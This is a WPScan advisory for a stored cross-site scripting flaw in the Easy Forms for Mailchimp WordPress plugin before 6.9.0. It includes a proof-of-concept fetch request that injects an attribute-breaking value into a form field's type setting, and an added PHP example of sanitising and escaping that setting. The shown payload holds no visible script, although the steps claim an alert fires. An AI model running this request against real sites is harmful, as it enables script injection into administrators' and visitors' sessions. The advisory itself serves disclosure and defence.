wpvulndb | Sławomir Zakrzewski (AFINE) | WPVDB-ID: 0B094CBA-9288-4C9C-87A9-BDCE286FE8B6
History: Dec 21, 2023 - 12:00 a.m.

Easy Forms for Mailchimp < 6.9.0 - Admin+ Stored Cross-Site Scripting

Published: 2023-12-21 00:00:00
Author: Sławomir Zakrzewski (AFINE)
Source: wpscan.com
5
Tags: mailchimp, cross-site scripting, admin, plugin, security, vulnerability

EPSS: 0.0004 (Low), percentile 14.2%

Description

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.

PoC

1. Create a new opt-in form.
2. Edit the form, and add a "First name" field.
3. Update the form.
4. Staying on the same page, run the following code in your browser console:

    await fetch(document.forms[0].action, {
      "credentials": "include",
      "headers": { "Content-Type": "application/x-www-form-urlencoded" },
      "body": `form-name=Test+form&form-description=Test+description&field%5BFNAME%5D%5Blabel%5D=First+Name&field%5BFNAME%5D%5Btype%5D=birthday\"'/>&field%5BFNAME%5D%5Bmerge%5D=FNAME&field%5BFNAME%5D%5Bposition%5D=1&field%5BFNAME%5D%5Bplaceholder%5D=&field%5BFNAME%5D%5Bdefault%5D=&field%5BFNAME%5D%5Bdescription%5D=&field%5BFNAME%5D%5Badditional-classes%5D=&yikes-easy-mc-form-class-names=&yikes-easy-mc-inline-form%5B%5D=0&yikes-easy-mc-submit-button-type%5B%5D=text&yikes-easy-mc-submit-button-text=Submit&yikes-easy-mc-submit-button-image=&yikes-easy-mc-submit-button-classes=&yikes-easy-mc-form-restriction-start-date=&yikes-easy-mc-form-restriction-start-time=&yikes-easy-mc-form-restriction-end-date=&yikes-easy-mc-form-restriction-end-time=&yikes-easy-mc-form-restriction-pending-message=Signup+is+not+yet+open%2C+and+will+be+available+on+September+12%2C+2023+at+8%3A13PM.+Please+come+back+then+to+signup.&yikes-easy-mc-form-restriction-expired-message=This+signup+for+this+form+ended+on+September+13%2C+2023+at+8%3A13PM.&yikes-easy-mc-form-restriction-login-message=You+need+to+be+logged+in+to+sign+up+for+this+mailing+list.&yikes-easy-mc-success-message=&yikes-easy-mc-success-single-optin-message=&yikes-easy-mc-user-resubscribed-success-message=&yikes-easy-mc-user-update-link=&yikes-easy-mc-user-subscribed-message=&yikes-easy-mc-update-email-successful=&yikes-easy-mc-update-email-failure=&yikes-easy-mc-general-error-message=&yikes-easy-mc-user-email-subject=&yikes-easy-mc-user-email-body=Greetings%2C%0D%0A%0D%0AA+request+has+been+made+to+update+your+Mailchimp+account+profile+information.+To+do+so+please+use+the+following+link%3A+%5Blink%5DUpdate+Mailchimp+Profile+Info%5B%2Flink%5D%0D%0A%0D%0AIf+you+did+not+request+this+update%2C+please+disregard+this+email.%0D%0A%0D%0A%26nbsp%3B%0D%0A%0D%0AThis+email+was+sent+from%3A+%5Burl%5D%0D%0A%0D%0A%26nbsp%3B%0D%0A%0D%0A%26nbsp%3B%0D%0A%3Cp+style%3D%22font-size%3A+13px%3B+margin-top%3A+5em%3B%22%3E%3Cem%3EThis+email+was+generated+by+the+%3Ca+href%3D%22http%3A%2F%2Fwww.wordpress.org%2Fplugins%2Fyikes-inc-easy-mailchimp-extender%2F%22+target%3D%22_blank%22+rel%3D%22noopener%22%3EEasy+Forms+for+Mailchimp%3C%2Fa%3E+plugin%2C+created+by+%3Ca+href%3D%22http%3A%2F%2Fwww.yikesinc.com%22+target%3D%22_blank%22+rel%3D%22noopener%22%3EYIKES+Inc.%3C%2Fa%3E%3C%2Fem%3E%3C%2Fp%3E&form_switcher=1&associated-list=${document.getElementById('associated-list').value }&single-double-optin=1&update-existing-user=1&update-existing-email=1&form-ajax-submission=1&redirect-user-on-submission=0&redirect-user-to-selection=1&custom-redirect-url=&redirect_new_window=0&hide-form-post-signup=0&replace-interest-groups=1`,
      "method": "POST",
      "mode": "cors"
    });

5. Refresh the page and notice the alert box from the JavaScript snippet we injected into field[FNAME][type] popping up.
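The root cause described above is a settings value (the field "type") that is stored verbatim and later rendered into an HTML attribute. The following is an added example of the defensive pattern a WordPress plugin should apply, written for this page and not taken from the Easy Forms for Mailchimp code base: validate the value against an allow-list on save, and escape it for its output context when rendering. All function names prefixed with `example_` and the allow-list contents are assumptions; the WordPress helpers used (`sanitize_key`, `sanitize_text_field`, `absint`, `wp_kses_post`, `esc_attr`, `esc_html`, `wp_unslash`, `current_user_can`) are real core functions.

```php
<?php
// Added example (not the plugin's own code): sanitise a form field's "type"
// setting on save and escape it on output, so a value such as the one sent
// in the PoC cannot break out of the attribute it is rendered into.

// Hypothetical allow-list of field types the form builder knows about.
const EXAMPLE_ALLOWED_FIELD_TYPES = array(
    'text', 'email', 'number', 'date', 'birthday', 'zip', 'phone', 'url',
);

/**
 * Reduce a submitted field type to a known value. sanitize_key() lowercases
 * and strips everything outside [a-z0-9_-], so quotes, slashes and angle
 * brackets never survive; anything still unknown falls back to 'text'.
 */
function example_sanitize_field_type( $raw ) {
    $candidate = sanitize_key( (string) $raw );
    return in_array( $candidate, EXAMPLE_ALLOWED_FIELD_TYPES, true ) ? $candidate : 'text';
}

/**
 * Sanitise the whole field[...] array from the settings POST before it is
 * persisted (update_option() / update_post_meta()). Keys are merge tags.
 * Each value is cleaned for the meaning it carries, not just stripped of tags.
 */
function example_sanitize_fields( array $fields ) {
    $clean = array();
    foreach ( $fields as $merge_tag => $field ) {
        $tag = sanitize_key( $merge_tag );
        if ( '' === $tag || ! is_array( $field ) ) {
            continue; // drop malformed entries instead of storing them
        }
        $clean[ $tag ] = array(
            'label'              => sanitize_text_field( $field['label'] ?? '' ),
            'type'               => example_sanitize_field_type( $field['type'] ?? '' ),
            'merge'              => $tag,
            'position'           => absint( $field['position'] ?? 0 ),
            'placeholder'        => sanitize_text_field( $field['placeholder'] ?? '' ),
            'default'            => sanitize_text_field( $field['default'] ?? '' ),
            'description'        => wp_kses_post( $field['description'] ?? '' ),
            'additional-classes' => sanitize_text_field( $field['additional-classes'] ?? '' ),
        );
    }
    return $clean;
}

/**
 * Output side: escape every value for the context it lands in, even though
 * it was sanitised on save. Stored settings are data, never trusted markup.
 * Attribute values use esc_attr(), text nodes use esc_html().
 */
function example_render_field( array $field ) {
    printf(
        '<label for="%1$s">%2$s</label>' .
        '<input id="%1$s" name="%1$s" type="%3$s" placeholder="%4$s" class="%5$s" />',
        esc_attr( $field['merge'] ),
        esc_html( $field['label'] ),
        esc_attr( $field['type'] ),
        esc_attr( $field['placeholder'] ),
        esc_attr( $field['additional-classes'] )
    );
}

// Usage in the settings handler, assuming the nonce has already been
// verified with check_admin_referer() and the caller's capability checked:
if ( current_user_can( 'manage_options' ) && isset( $_POST['field'] ) ) {
    $fields = example_sanitize_fields( wp_unslash( (array) $_POST['field'] ) );
    // ... persist $fields, then later render each entry with example_render_field().
}
```

Run against the PoC's `field[FNAME][type]` value of `birthday"'/>`, `sanitize_key()` reduces it to `birthday`, which is on the allow-list, so the form keeps a usable field type while the attribute-breaking characters never reach the database. The output-side `esc_attr()` is kept regardless, because the same setting may be written by other code paths (imports, migrations, older versions) that did not pass through the sanitiser; the `unfiltered_html` capability has no bearing on either step, since the plugin, not core's post filter, decides what it stores.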
CPE (Name / Operator / Version): operator eq, version 6.9.0

